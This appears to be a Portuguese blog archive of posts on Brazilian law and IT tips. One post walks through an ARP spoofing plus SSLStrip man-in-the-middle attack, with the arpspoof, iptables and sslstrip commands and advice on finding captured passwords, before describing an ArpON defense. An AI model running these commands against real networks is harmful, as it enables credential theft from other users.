06/01/2013

Turma aplica nova redação da Súmula 428 e defere horas de sobreaviso a empregado que permanecia aguardando ordens

Recentemente, na 2ª Semana do Tribunal Superior do Trabalho, a Súmula 428 recebeu nova redação. Se antes o empregado que usa aparelho de intercomunicação fora do horário regular de trabalho somente teria direito a receber horas de sobreaviso quando ficasse proibido de sair de casa, aguardando o chamado do empregador, agora, a simples espera pela convocação para o serviço durante o período de descanso é suficiente para gerar o direito ao recebimento do tempo de sobreaviso.

“Considera-se em sobreaviso o empregado que, à distância e submetido a controle patronal por instrumentos telemáticos ou informatizados, permanecer em regime de plantão ou equivalente, aguardando a qualquer momento o chamado para o serviço durante o período de descanso”. Esse é o teor do inciso II, que alterou a Súmula 428 e foi aplicado pela 5ª Turma do TRT-MG para dar provimento ao recurso do empregado e condenar a empregadora ao pagamento de 48 horas mensais de sobreaviso, à razão de 1/3 da remuneração, com reflexos nas demais parcelas.

A decisão de 1º Grau havia indeferido o pedido, com o que não concordou o empregado, apresentando recurso. Segundo esclareceu o desembargador José Murilo de Morais, o trabalhador afirmou que permanecia de sobreaviso, à disposição da reclamada, com o celular ligado o tempo todo, aguardando convocação para o serviço, sem poder se ausentar da cidade. Em depoimento pessoal, o autor confessou que o sobreaviso ocorria uma vez por mês, sábado e domingo inteiros, e que, nessa situação, podia seguir com a vida normal, desde que permanecesse com o telefone e não fizesse uso de bebida alcoólica.

A empresa, por sua vez, limitou-se a negar o pedido do empregado, com fundamento no antigo entendimento da Súmula 428. Nesse contexto e levando em conta a modificação de posicionamento do TST, o relator entendeu que o empregado tem direito a receber as horas que permaneceu de sobreaviso e modificou a decisão de 1º Grau, condenando a ré, no que foi acompanhado pela Turma julgadora.

Processo nº 0000932-28.2011.5.03.0055 AIRR

06/01/2013

Um pouco sobre o campo TTL do ping

Uma pequena dica para entender o campo TTL, que o aplicativo para teste de conectividade ping retorna.

Para verificar a conectividade, o aplicativo mais usado é o ping, em testes de rede local, caso não tenha conectividade, verifique sempre se o firewall dos computadores não está bloqueando, se necessário, deixe desabilitado até realizar os testes e depois volte a habilitar.

O ping fornece várias informações úteis que devem ser observadas, como:

  • Tempo de resposta entre o envio e o recebimento do pacote;
  • Tamanho do pacote enviado;
  • O sistema operacional remoto;
  • A quantidade de roteadores, ou saltos, que esse pacote sofreu até atingir o seu destino que é identificado no campo TTL (sendo este o foco dessa dica).

Quando usamos o ping para verificar a conectividade de algum equipamento que rode sistema operacional GNU/Linux, esse retorna no campo TTL o valor 65:

Se o aplicativo ping retornar no campo TTL o valor 128, é porque o sistema operacional de destino é Windows:

O campo TTL (Time to Live) é um tempo máximo em que o pacote tem de vida na rede e a cada roteador que ele passa, é chamado de salto (hop), ele é decrementado em 1. E quando atinge o valor de 0 (zero), ele é descartado para evitar que o pacote fique perdido em looping na rede sem achar o seu destino.

Para um ping, o sistema operacional por padrão devolve os seguintes valores:

  • 255 – Sistema operacional Unix
  • 128 – Sistema operacional Windows
  • 64 – Sistema operacional Linux

Esses são os valores padrão, mas muitos administradores costumam alterar esses valores para parecer que um SO é outro e assim, dificultar que alguém mal intencionado descubra através do ping o SO e tente fazer algum ataque.

Esta técnica é mais usada em servidores, em desktops na maioria dos casos ficam o default mesmo, em uma rede local (LAN) o valor de retorno é exatamente o citado acima, já se o ping for realizado para dispositivo de uma outra rede (WAN), esse valor vai sendo decrementado a cada roteador que passa.

Com o auxílio do aplicativo tracer do Windows ou do traceroute do GNU/Linux, pode-se ajudar a entender o caminho do pacote entre a origem e o destino. Na tela abaixo, podemos verificar um ping para um servidor de DNS (OpenDNS) externo onde passa por diversos roteadores (ida e volta):

Linux: Entendendo o campo TTL do ping
06/01/2013

Como funciona o ataque ARP spoofing + SSLStrip

Veremos um pouco sobre o SSLStrip, descobriremos que o uso da conexão segura SSL não garante a proteção do usuário 100%. Muita gente acha que ao usar HTTPS, está livre de qualquer ataque de crackers, mas na verdade não é bem assim, existem métodos que possibilitam o roubo de informações mesmo em sites seguros.

O SSLStrip nos permite isso, esta técnica é relativamente fácil de aplicar e extremamente poderosa. Ela funciona juntamente com o arpspoof.

Quando um usuário conecta-se em um site seguro, ele transfere as informações criptografadas com o servidor impedindo um ataque de sniffing tradicional. Quando realizamos o ataque de SSLStrip, primeiramente interceptamos o tráfego do alvo através de técnicas man-in-the-middle, assim, o atacante engana o alvo fazendo-se passar por um proxy e engana o servidor se passando pelo cliente, assim as informações são passadas para o atacante em texto puro.

Abaixo demonstrarei como funciona o ataque propriamente dito, utilizei um BackTrack 5 R2 para usar o SSLStrip e um Windows como alvo.

* Todas as informações aqui contidas são para fins didáticos e não para causar danos e prejuízos para alguém, usem este conhecimento com ética e responsabilidade.

Procedimentos

Primeiramente habilitaremos o encaminhamento de pacotes para realizar o ARP spoofing:

# echo “1” > /proc/sys/net/ipv4/ip_forward

Agora, vá até o diretório do SSLStrip no BackTrack:

# cd /pentest/web/sslstrip

Redirecione o tráfego da porta 80 para a porta que utilizaremos no SSLStrip, no caso, redirecionei para a porta 8080:

# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

Agora vamos mandar o SSLStrip escutar o tráfego na porta 8080 e mandar ele logar tudo:

# python sslstrp.py -a -l 8080

Depois disso, em outro terminal, comece o ARP spoofing entre a vítima e o gateway:

# arpspoof -i eth0 -t 192.168.0.55 192.168.0.1

Em outro terminal:

# arpspoof -i eth0 -t 192.168.0.1 192.168.0.55

Você pode acompanhar o tráfego dando:

# tail -f sslstrip.log

Para ver as senhas, procure por login ou passwd dentro do arquivo de log, não se assuste com a quantidade de informações dentro do arquivo, é assim mesmo.

Obs.: Se você estiver tentando capturar senhas do Gmail e a vítima estiver utilizando o Google Chrome não vai funcionar, tem que ser outro navegador, como o IE por exemplo. Mas o resto funciona, como: Facebook, Terra, entre outros.

Como se proteger

O ArpON é uma ferramenta open source que faz ARP seguro, evitando, com isso, ataques como Man-in-the-middle, DHCP Spoofing, DNS Spoofing, Web Spoofing, Sequestro de sessão SSL, entre outros. Ela funciona monitorando a tabela ARP da rede, gera e bloqueia alterações na tabela.

Bem, como na maioria das empresas a maioria dos hosts são Windows, iremos basear o laboratório no seguinte cenário:

                 
     FIREWALL  / GATEWAY
                    |
                  SWITCH
                    |
        ---------------------------
        |           |             |
       HOST        HOST          HOST

Não sei se dá para entender (hehehe), mas vamos amos explicar mais um. pouco. É no nosso servidor GNU/Linux que compartilha a Internet para a rede interna que será instalado o ArpON, e nele, iremos colocar todos os IPs e MACs dos nossos clientes.

Assim, quando algum usuário malicioso tentar fazer o ARP spoofing, ele não irá conseguir completar. Do alvo para o gateway, ele vai conseguir, pois não temos nenhuma proteção no cliente. Mas quando ele tentar fazer do gateway para o alvo, ele não vai conseguir, pois o ArpON que está no gateway irá bloquear, com isso, impedimos o ataque e conseguimos até ver qual é o usuário espertinho.

Bem, vamos colocar a mão na massa. Para instalar o ArpON:

# aptitude install arpon

Agora, edite o arquivo de configuração do ArpON:

# pico /etc/default/arpon

Descomente a linha:

DAEMON_OPTS=”-d -f /var/log/arpon/arpon.log -g -i eth1 -s”

Obs.: Repare que existe um parâmetro nessa linha (-i eth1) que não haverá no arquivo de vocês, é porque no meu laboratório a interface da rede interna é eth1, caso a de vocês seja eth0, não é necessário colocar este parâmetro.

E mude a linha:

RUN=”no”

Para:

RUN=”yes”

Agora precisamos cadastrar os IPs e MACs dos clientes:

# pico /etc/arpon.sarpi

Edite o arquivo da seguinte forma:

#IP              MAC
192.168.0.5          f5:f5:f5:f5:f5:f5

Obs.: Faça a identação com tabulações.

Agora é só iniciar o ArpON:

# /etc/init.d/arpon start

E acompanhar os logs:

# tail -f /var/log/arpon/arpon.log

Fonte: http://bit.ly/VAX4Fa

21/12/2012

Álcool e trânsito: crime ou infração administrativa?

Está em vigor a nova lei seca (Lei 12.760), que endurece o Código de Trânsito. A tragédia nacional das mortes está retratada nos nossos levantamentos do institutoavantebrasil.com.br.  Dirigir sob o efeito do álcool ou outra substância psicoativa é crime ou infração administrativa? O crime está previsto no art. 306, enquanto esta última está contemplada no art. 165 do CTB. Qual a diferença entre eles?

Se o condutor dirige o veículo automotor “sob a influência do álcool ou outra substância” está cometendo a infração administrativa do art. 165. Se conduz o veículo automotor sob tal influência e com a “capacidade psicomotora alterada” ingressa no crime do art. 306. Essa foi a fórmula encontrada pelo legislador para diferenciar o crime da infração administrativa.

Nesta última a capacidade de dirigir com segurança se reduz, diminui, mas não desaparece. O agente está apenas “sob a influência” do álcool ou outra substância. O nível do risco (para a segurança viária e, em consequência, para a vida ou integridade física alheia) não é grande, a ponto de o sujeito não ter o controle do veículo.

As sanções cabíveis nesse caso, de acordo com a nova lei, são: 1) multa de R$ 1.915,40, 2) suspensão do direito de dirigir por 12 meses, 3) recolhimento da carteira de habilitação, 4) retenção do veículo e 5) sete pontos na carteira em razão da infração gravíssima.

Para a configuração do crime, punido com prisão de 6 meses a 3 anos, além das sanções administrativas, o nível de exigência é maior. É preciso que o condutor esteja com a “capacidade psicomotora alterada”, ou seja, ele não faz uma direção segura, colocando indeterminadamente em risco a vida ou integridade física alheia, isto é, rebaixando concretamente o nível da segurança viária. Não é preciso ter vítima concreta. Basta a comprovação de que o agente não estava em condições de dirigir com segurança (capacidade psicomotora alterada).

Exemplos de configuração do crime: o sujeito ingeriu álcool ou outra substância e dirigia de forma anormal (ziguezague, subiu calçada etc.); ou estava visivelmente, ostensivamente, notoriamente embriagado (não conseguindo sequer caminhar sozinho, por exemplo); o sujeito tinha 1,5g de álcool por litro de sangue ou mais (situação inequívoca de embriaguez, com patente redução da capacidade de dirigir com segurança). Nessas três situações a configuração do crime é inequívoca.

Situações que gerarão dúvida: (a) o condutor tem de 0,6 decigramas a 1,5g de álcool por litro de sangue. Tudo depende aqui do caso concreto, da pessoa concreta etc. Cada pessoa reage de uma forma frente ao álcool: pode ou não perder sua capacidade psicomotora; (b) caso de provas unicamente testemunhas, clínicas, vídeos, imagens, filmagens etc. Tudo depende de cada caso concreto.

Nas três primeiras situações o juiz agirá com segurança. Nas duas últimas depende da valoração do condutor e de todas as circunstâncias do caso. Muitas polêmicas acontecerão em torno da “capacidade psicomotora alterada”. É que muita gente bebe 2 copos de cerveja e não sente nenhum tipo de alteração. Outros (sensíveis), até com um copo já se encontram alterados.

Na dúvida, ou seja, quando o juiz não reúne prova suficiente e segura para condenar pelo delito, cabe-lhe absolver o réu, enviando cópia de tudo à autoridade de trânsito para o enquadramento do agente no art. 165 do CTB. Como se vê, quem ingere álcool ou outra substância e dirige, não vai escapar: ou está praticando crime ou uma infração administrativa (com duras sanções), salvo casos de tolerância, como a ingestão de um bombom com licor.

Fonte: http://bit.ly/TcPYYG

15/12/2012

Cinco coisas que todo profissional de TI DEVE e TEM que saber

Qualquer um que trabalhe na área de TI há mais de 10 minutos sabe que uma parte enorme do trabalho é a solução de problemas. Algum item – não importa o quê – vai quebrar ou parar de funcionar de uma forma nova e completamente inesperada e, por padrão, é você que terá que consertá-lo. E rápido.

O problema? Não importa quantos livros você já tenha lido… Nenhum livro ou professor poderá magicamente dar a você as habilidades dedutivas para resolvê-lo. O que funciona é muita experiência,  muitas horas dedicadas ao exame de problemas aparentemente insolúveis, e algum conhecimento prático a respeito do atual ambiente de TI.

Aqui estão cinco skills que todo o profissional de TI deve dominar.

1 – Como usar um analisador de protocolo.

É bem provável que você jamais tenha usado um analisador de protocolo antes. Afinal, ele parece ser uma ferramenta de uso exclusivo de engenheiros de rede, certo? Acontece que hoje, literalmente, tudo está em rede, e, de alguma forma, saber o que realmente acontece com ela ​​pode ser extremamente útil para qualquer pessoa.

Na verdade, ser capaz de entender o que está acontecendo com o tráfego da rede é, sem dúvida,  muito útil para analistas e programadores. Além disso, é realmente divertido.

Há quem use analisadores de protocolo com propósitos maliciosos, como capturar o tráfego da rede com o objetivo de obter cópias de arquivos importantes durante a sua transmissão, senhas que permitam estender o raio de penetração em um ambiente invadido ou ver conversas em tempo real.

Se você nunca tentou antes, procure usar o Wireshark. Com ele é possível monitorar tudo o que entra e sai da rede, independente do protocolo utilizado (TCP, FTP, HHTP, AIM, NetBIOS, etc).

2 – Como depurar e identificar falhas em aplicações Web.

De todas as descrições de problemas que recebo, minha favorita é: “É lento!” Pode acontecer com qualquer tipo de aplicação, mas é particularmente irritante com aplicações Web.

Existem muitas ferramentas que podem ajudá-lo com este tipo de problema, mas você pode começar pelo Fiddler Web Debugger, um plug-in para Firefox, e/ou pelo Web Developer, incorporado também ao Chrome.

Da próxima vez que você tiver um problema de desempenho em uma aplicação Web, recorra a um dos dois. Você poderá se surpreender com a quantidade de componentes e arquivos necessários para gerar uma página, seu tamanho total, o quão rápido expira a cache, entre outras informações úteis para identificar o que pode estar travando o carregamento de uma aplicação ou uma página Web..

3 – Como lidar com energia e cabeamento.

Esta é uma habilidade generalista da TI que todo profissional acaba tendo que saber. Quer se trate de ser capaz de dizer a diferença entre um cabo Ethernet crossover e um direto, saber a diferença entre tomadas L5-30 e L6-30, ou apenas ser capaz de fazer um cabo de Ethernet com o comprimento certo para chegar seu destino, esse pode ser um conhecimento indispensável.

4 – Como funciona a virtualização, sob o capô do seu hypervisor.

Compreender como as coisas funcionam por baixo do capô do seu hypervisor e como isso pode mudar a maneira de solucionar problemas de desempenho, pode ser a diferença entre perder ou ganhar a batalha para solucionar um problema. Longe vão os dias em que simplesmente abrir o Gerenciador de Tarefas e ver o quão ocupado o servidor estava revelava realmente o que podia estar acontecendo.

Você precisa fazer experiências com sua infraestrutura virtualizada e aprender como o agendamento de recursos funciona. Isto é, como o hypervisor aloca os recursos entre as máquinas virtuais (agenda o tempo da CPU e as requisições de I/O, etc) e provê o isolamento entre as diversas máquinas virtuais.

Coloque diferentes limites de desempenho de CPU na VM e veja como o desempenho é afetado. Você ficará surpreso com o que você encontrará.

5 – Como escrever scripts úteis.

Simplificando, a programação não é apenas para desenvolvedores. Conhecer uma linguagem de script como Perl ou Python, não importa qual delas, pode ser extremamente útil.

A próxima vez que você se encontrar diante de uma tarefa chata, tente encontrar uma maneira de fazer o que você está tentando fazer com um script. As possibilidades são imensas. 

Isso é apenas o começo

Expandir seus horizontes para incluir coisas que você nunca fez antes, ou não conhece, certamente dará a você condições de começar a olhar os problemas de outra maneira. Pense nisso.

Fonte: CIO

02/11/2012

LINUX – A tecla mágica SysRQ

A tecla SysRq, que fica na fileira superior do teclado, fica junto com a tecla Print Scrn (Print Screen). Esta é uma tecla mágica e pode realizar diversas funções diferentes, em combinação com outras teclas.

Para esta tecla funcionar, é preciso primeiramente ativar esta função. Para isto execute, como root, o comando abaixo:

  echo "1" > /proc/sys/kernel/sysrq

As funções são sempre invocadas pressionando-se primeiramente as teclas <Alt> + <SysRq>, seguida da função que se deseja invocar.

A tabela abaixo resume as funções existentes:

-k Mata todos os processos sendo executados na console virtual ativa.
-s Tenta sincronizar todas as partições montadas
-b Reboota o sistema imediatamente, sem desmontar ou sincronizar as partições (perigoso)
-e Envia um sinal de encerramento (SIGTERM) para todos os processos com exceção do processo init.
-m Exibe informação de uso de memória na console do sistema.
-i Envia o sinal SIGKILL (kill -9) a todos os processos com exceção do processo init.
-r Chaveia o teclado do modo raw (usado por programas como X11) para o modo XLATE.
-s Sincroniza todas as partições montadas
-t Gera uma listagem de todas as tarefas ativas e exibe na console.
-u Remonta todas as partições em modo apenas leitura (read-only).
-o Encerra o sistema imediatamente (shutdown)
-p Imprime na console o valor dos registradores e flags
-0-9 Define o nível da console, controlando quais mensagens do kernel serão exibidas na console.
-f Invoca oom_kill para matar os processos que estiverem usando mais memória.
-h Usado para exibir a ajuda (help). Entretanto qualquer outra tecla exibe a ajuda.

Muitas das funções acima não são mais usadas ou possuem pouca utilidade. Por exemplo, as funções acima que exibem a informação na console só irão funcionar se você estiver com uma console ativa.

Eu acho bastante útil a diretiva -b, quando o sistema ficar totalmente instável e não estiver mais respondendo aos seus comandos. Mas lembre-se, esta opção é um shutdown radical, os processos são encerrados sem misericórdia e as partições não são sincronizadas. Uma alternativa mais suave é usar a opção -o, que realiza um shutdown mais controlado.

Para ver a saída gerada pelos comandos listados acima, você pode usar, em sistemas gráficos, o comando dmesg ou então inspecionar diretamente o conteúdo do arquivo /var/log/syslog.

Por exemplo, para monitorar em tempo real as atualizações do arquivo /var/log/syslog:

  tail -f /var/log/syslog

Possivelmente você precisará dos privilégios do usuário root para emitir este comando com sucesso. 

28/10/2012

A Pena de Reclusão e a de Detenção

Vou dar uma explicação bem resumida sobre reclusão e detenção.

Ambas são penas restritivas de liberdade. O próprio código define em quais crimes é aplicável a reclusão (homicídio doloso, furto, roubo, tráfico de drogas etc.) ou a detenção (homicídio culposo, dano, vilipêndio a cadáver [crime gravíssimo] etc.).

A única diferença entre as duas formas de pena é o regime que pode ser determinado na sentença condenatória (art. 33, Código Penal).

Na reclusão, o condenado deve cumprir a pena nos regimes fechado, semi-aberto ou aberto.

Se condenado à pena de detenção, só é possível aplicar os regimes semi-aberto ou aberto.

O regime fechado é o clássico. A pena é cumprida na penitenciária, atrás das grades, isolado do resto do mundo (Art. 87 a 90, Lei de Execução Penal).

O regime semi-aberto já é menos severo. Pode ser executado em colônia agrícola ou industrial, e a segurança desses locais é bem menor do que de uma penitenciária (art. 91 e 92, LEP).

O regime aberto, por falta de estrutura, é quase uma absolvição com efeitos penais, pois a única coisa que acontece é o nome do condenado ser inscrito no rol dos culpados e ficar estabelecida reincidência caso o acusado cometa um outro crime.

Na verdade, no regime aberto, o condenado deveria passar o dia trabalhando livremente e se recolher durante a noite para um estabelecimento (casa do albergado), mas isso não existe, então o cara volta para casa (art. 93 a 95, LEP).

E é isso.

28/10/2012

Descubierta una vulnerabilidad en Gmail mediante un email que ofrecía trabajo en Google

MADRID, 25 (Portaltic/EP)

Un usuario de Gmail, el servicio de correo de Google, ha detectado una vulnerabilidad en el sistema. Este fallo fue descubierto cuanto el matemático Zachary Harris recibió una oferta de trabajo de la propia Google. El problema de Gmail radicaba en la clave DKIM, utilizada para iniciar sesión en los dominios de correo electrónico.

Todo comenzó con un extraño email de un reclutador de Google enviado al matemático de 35 años, Zachary Harris. En dicho correo, le ofrecían un puesto como ingeniero en fiabilidad web. “Es obvio que tiene pasión por Linux y por la programación. Me gustaría saber si usted está abierto a explorar, confidencialmente, oportunidades en Google”, decía el email.

La primera opción que barajó Harris fue que el email había sido falsificado, enviado por un estafador que quería hacerse pasar por un empleado del gigante de las búsquedas. Sin embargo, cuando el matemático examinó toda la información que había en el correo, se dio cuenta de que todo estaba en orden y parecía legítimo.

Harris se percató de que Google estaba usando una clave criptográfica débil para certificar a los destinatarios de que su correspondencia venía de un dominio legítimo de Google. Por lo tanto, cualquier persona que pueda desvelar esa clave, podría utilizarla para suplantar a un remitente.

El problema radicaba en la clave DKIM (DomainKeys Identified Mail) que Google utiliza para Gmail. DKIM incluye una clave criptográfica que se utiliza para iniciar sesión en los dominios de correo electrónico y sirve para confirmar a un destinatario que la información del encabezado en un e-mail es correcta. Cuando el correo electrónico llega a su destino, el receptor puede buscar la clave pública a través de los registros DNS del remitente y verificar la validez de la firma.

“El hecho de que yo entrara en esto sin saber lo que es una cabecera DKIM, demuestra que alguien con conocimientos técnicos suficientes puede resolverlo sobre la marcha”, asegura Harris.

Por razones de seguridad, las llamadas estándar DKIM son de, al menos 1.024 bits de longitud. Sin embargo, Google estaba usando una clave de 512 bit que podría ser fácilmente corrompible. Teniendo en cuenta todo esto, Harris pensó que Google no podría ser tan “descuidado” por lo que el matemático, pese a no estar interesado en la oferta de trabajo, desencriptó la clave y envió un mensaje a los fundadores de Google, Sergey Bin y Larry Page.

Harris se aseguró que los mensajes que se enviaran desde las cuentas de los fundadores del gigante de las búsquedas le llegaran también a él. Sin embargo, dos días después las claves encriptadas del correo de Google habían cambiado repentinamente a 2.048 bits. Además, Harris nunca recibió respuesta de los fundadores de Google.

Por ello, Harris se dio cuenta de que la vulnerabilidad que había encontrado era cierta. Además, comenzó a explorar otras webs y se percató de que muchas de ellas tenían el mismo problema con las claves DKIM: PayPal, Yahoo, Amazon, eBay, Apple, Dell, LinkedIn, Twitter, SBCGlobal, Bank EE.UU., HP, Match.com y HSBC.

Según la revista Wired, una portavoz de Google ha afirmado que la compañía ha estado trabajando en esta vulnerabilidad y ya ha revocado las claves para todos sus dominios afectados y reeditado otros nuevos mayores de 1.024 bits.

Fonte: Wired (http://www.wired.com/threatlevel/2012/10/dkim-vulnerability-widespread/all/).

28/10/2012

Regime de bens e divisão da herança: dúvidas jurídicas no fim do casamento

Antes da celebração do casamento, os noivos têm a possibilidade de escolher o regime de bens a ser adotado, que determinará se haverá ou não a comunicação (compartilhamento) do patrimônio de ambos durante a vigência do matrimônio. Além disso, o regime escolhido servirá para administrar a partilha de bens quando da dissolução do vínculo conjugal, tanto pela morte de um dos cônjuges, como pela separação.

O instituto, previsto nos artigos 1.639 a 1.688 do Código Civil de 2002 (CC/02), integra o direito de família, que regula a celebração do casamento e os efeitos que dele resultam, inclusive o direito de meação (metade dos bens comuns) – reconhecido ao cônjuge ou companheiro, mas condicionado ao regime de bens estipulado.

A legislação brasileira prevê quatro possibilidades de regime matrimonial: comunhão universal de bens (artigo 1.667 do CC), comunhão parcial (artigo 1.658), separação de bens – voluntária (artigo 1.687) ou obrigatória (artigo 1.641, inciso II) – e participação final nos bens (artigo 1.672).

A escolha feita pelo casal também exerce influência no momento da sucessão (transmissão da herança), prevista nos artigos 1.784 a 1.856 do CC/02, que somente ocorre com a morte de um dos cônjuges.

Segundo o ministro Luis Felipe Salomão, da Quarta Turma do Superior Tribunal de Justiça (STJ), “existe, no plano sucessório, influência inegável do regime de bens no casamento, não se podendo afirmar que são absolutamente independentes e sem relacionamento, no tocante às causas e aos efeitos, esses institutos que a lei particulariza nos direitos de família e das sucessões”.

Regime legal

Antes da Lei 6.515/77 (Lei do Divórcio), caso não houvesse manifestação de vontade contrária, o regime legal de bens era o da comunhão universal – o cônjuge não concorre à herança, pois já detém a meação de todo o patrimônio do casal. A partir da vigência dessa lei, o regime legal passou a ser o da comunhão parcial, inclusive para os casos em que for reconhecida união estável (artigos 1.640 e 1.725 do CC).

De acordo com o ministro Massami Uyeda, da Terceira Turma do STJ, “enquanto na herança há substituição da propriedade da coisa, na meação não, pois ela permanece com seu dono”.

No julgamento do Recurso Especial (REsp) 954.567, o ministro mencionou que o CC/02, ao contrário do CC/1916, trouxe importante inovação ao elevar o cônjuge ao patamar de concorrente dos descendentes e dos ascendentes na sucessão legítima (herança). “Com isso, passou-se a privilegiar as pessoas que, apesar de não terem grau de parentesco, são o eixo central da família”, afirmou.

Isso porque o artigo 1.829, inciso I, dispõe que a sucessão legítima é concedida aos descendentes, em concorrência com o cônjuge sobrevivente (exceto se casado em regime de comunhão universal, em separação obrigatória de bens – quando um dos cônjuges tiver mais de 70 anos ao se casar – ou se, no regime de comunhão parcial, o autor da herança não tiver deixado bens particulares).

O inciso II do mesmo artigo determina que, na falta de descendentes, a herança seja concedida aos ascendentes, em concorrência com o cônjuge sobrevivente, independentemente do regime de bens adotado no casamento.

União estável

Em relação à união estável, o artigo 1.790 do CC/02 estabelece que, além da meação, o companheiro participa da herança do outro, em relação aos bens adquiridos na vigência do relacionamento.

Nessa hipótese, o companheiro pode concorrer com filhos comuns, na mesma proporção; com descendentes somente do autor da herança, tendo direito à metade do que couber ao filho; e com outros parentes, tendo direito a um terço da herança.

No julgamento do REsp 975.964, a ministra Nancy Andrighi, da Terceira Turma do STJ, analisou um caso em que a suposta ex-companheira de um falecido pretendia concorrer à sua herança. A ação de reconhecimento da união estável, quando da interposição do recurso especial, estava pendente de julgamento.

Consta no processo que o falecido havia deixado um considerável patrimônio, constituído de imóveis urbanos, várias fazendas e milhares de cabeças de gado. Como não possuía descendentes nem ascendentes, quatro irmãs e dois sobrinhos – filhos de duas irmãs já falecidas – seriam os sucessores.

Entretanto, a suposta ex-companheira do falecido moveu ação buscando sua admissão no inventário, ao argumento de ter convivido com ele, em união estável, por mais de 30 anos. Além disso, alegou que, na data da abertura da sucessão, estava na posse e administração dos bens deixados por ele.

Meação

De acordo com a ministra Nancy Andrighi, com a morte de um dos companheiros, entrega-se ao companheiro sobrevivo a meação, que não se transmite aos herdeiros do falecido. “Só então, defere-se a herança aos herdeiros do falecido, conforme as normas que regem o direito das sucessões”, afirmou.

Ela explicou que a meação não integra a herança e, por consequência, independe dela. “Consiste a meação na separação da parte que cabe ao companheiro sobrevivente na comunhão de bens do casal, que começa a vigorar desde o início da união estável e se extingue com a morte de um dos companheiros. A herança, diversamente, é a parte do patrimônio que pertencia ao companheiro falecido, devendo ser transmitida aos seus sucessores legítimos ou testamentários”, esclareceu.

Para resolver o conflito, a Terceira Turma determinou que a posse e administração dos bens que integravam a provável meação deveriam ser mantidos sob a responsabilidade da ex-companheira, principalmente por ser fonte de seu sustento, devendo ela requerer autorização para fazer qualquer alienação, além de prestar contas dos bens sob sua administração.

Regras de sucessão

A regra do artigo 1.829, inciso I, do CC, que regula a sucessão quando há casamento em comunhão parcial, tem sido alvo de interpretações diversas. Para alguns, pode parecer que a regra do artigo 1.790, que trata da sucessão quando há união estável, seja mais favorável.

No julgamento do REsp 1.117.563, a ministra Nancy Andrighi afirmou que não é possível dizer, com base apenas nas duas regras de sucessão, que a união estável possa ser mais vantajosa em algumas hipóteses, “porquanto o casamento comporta inúmeros outros benefícios cuja mensuração é difícil”.

Para a ministra, há uma linha de interpretação, a qual ela defende, que toma em consideração a vontade manifestada no momento da celebração do casamento, como norte para a interpretação das regras sucessórias.

Companheira e filha

No caso específico, o autor da herança deixou uma companheira, com quem viveu por mais de 30 anos, e uma filha, fruto de casamento anterior. Após sua morte, a filha buscou em juízo a titularidade da herança.

O juiz de primeiro grau determinou que o patrimônio do falecido, adquirido na vigência da união estável, fosse dividido da seguinte forma: 50% para a companheira (correspondente à meação) e o remanescente dividido entre ela e a filha, na proporção de dois terços para a filha e um terço para a companheira.

Para a filha, o juiz interpretou de forma absurda o artigo 1.790 do CC, “à medida que concederia à mera companheira mais direitos sucessórios do que ela teria se tivesse contraído matrimônio, pelo regime da comunhão parcial”.

Ao analisar o caso, Nancy Andrighi concluiu que, se a companheira tivesse se casado com o falecido, as regras quanto ao cálculo do montante da herança seriam exatamente as mesmas.

Ou seja, a divisão de 66% dos bens para a companheira e de 33% para a filha diz respeito apenas ao patrimônio adquirido durante a união estável. “O patrimônio particular do falecido não se comunica com a companheira, nem a título de meação, nem a título de herança. Tais bens serão integralmente transferidos à filha”, afirmou.

De acordo com a ministra, a melhor interpretação do artigo 1.829, inciso I, é a que valoriza a vontade das partes na escolha do regime de bens, mantendo-a intacta, tanto na vida quanto na morte dos cônjuges.

“Desse modo, preserva-se o regime da comunhão parcial de bens, de acordo com o postulado da autodeterminação, ao contemplar o cônjuge sobrevivente com o direito à meação, além da concorrência hereditária sobre os bens comuns, haja ou não bens particulares, partilháveis estes unicamente entre os descendentes”, mencionou.

Vontade do casal

Para o desembargador convocado Honildo Amaral de Mello Castro (já aposentado), “não há como dissociar o direito sucessório dos regimes de bens do casamento, de modo que se tenha após a morte o que, em vida, não se pretendeu”.

Ao proferir seu voto no julgamento de um recurso especial em 2011 (o número não é divulgado em razão de segredo judicial), ele divergiu do entendimento da Terceira Turma, afirmando que, se a opção feita pelo casal for pela comunhão parcial de bens, ocorrendo a morte de um dos cônjuges, ao sobrevivente é garantida somente a meação dos bens comuns – adquiridos na vigência do casamento.

No caso, o Tribunal de Justiça do Distrito Federal reformou sentença de primeiro grau para permitir a concorrência, na sucessão legítima, entre cônjuge sobrevivente, casado em regime de comunhão parcial, e filha exclusiva do de cujus (autor da herança), sobre a totalidade da herança.

A menor, representada por sua mãe, recorreu ao STJ contra essa decisão, sustentando que, além da meação, o cônjuge sobrevivente somente concorre em relação aos bens particulares do falecido, conforme a decisão proferida em primeiro grau.

Interpretação

Para o desembargador Honildo Amaral, em razão da incongruência da redação do artigo 1.829, inciso I, do CC/02, a doutrina brasileira possui correntes distintas acerca da interpretação da sucessão do cônjuge casado sob o regime de comunhão parcial de bens.

Em seu entendimento, a decisão que concedeu ao cônjuge sobrevivente, além da sua meação, direitos sobre todo o acervo da herança do falecido, além de ferir legislação federal, desrespeitou a autonomia de vontade do casal quando da escolha do regime de comunhão parcial de bens.

O desembargador explicou que, na sucessão legítima sob o regime de comunhão parcial, não há concorrência em relação à herança, nem mesmo em relação aos bens particulares (adquiridos antes do casamento), visto que o cônjuge sobrevivente já está amparado pela meação. “Os bens particulares dos cônjuges são, em regra, incomunicáveis em razão do regime convencionado em vida pelo casal”, afirmou.

Apesar disso, ele mencionou que existe exceção a essa regra. Se inexistentes bens comuns ou herança a partilhar, e o falecido deixar apenas bens particulares, a concorrência é permitida, “tendo em vista o caráter protecionista da norma que visa não desamparar o sobrevivente nessas situações excepcionais”.

Com esse entendimento, a Quarta Turma conheceu parcialmente o recurso especial e, nessa parte, deu-lhe provimento. O desembargador foi acompanhado pelos ministros Luis Felipe Salomão e João Otávio de Noronha.

Contra essa decisão, há embargo de divergência pendente de julgamento na Segunda Seção do STJ, composta pelos ministros da Terceira e da Quarta Turma.

Proporção do direito

É possível que a companheira receba verbas do trabalho pessoal do falecido por herança? Em caso positivo, concorrendo com o único filho do de cujus, qual a proporção do seu direito?

A Quarta Turma do STJ entendeu que sim. “Concorrendo a companheira com o descendente exclusivo do autor da herança – calculada esta sobre todo o patrimônio adquirido pelo falecido durante a convivência –, cabe-lhe a metade da quota-parte destinada ao herdeiro, vale dizer, um terço do patrimônio do de cujus”, afirmou o ministro Luis Felipe Salomão em julgamento de 2011 (recurso especial que também tramitou em segredo).

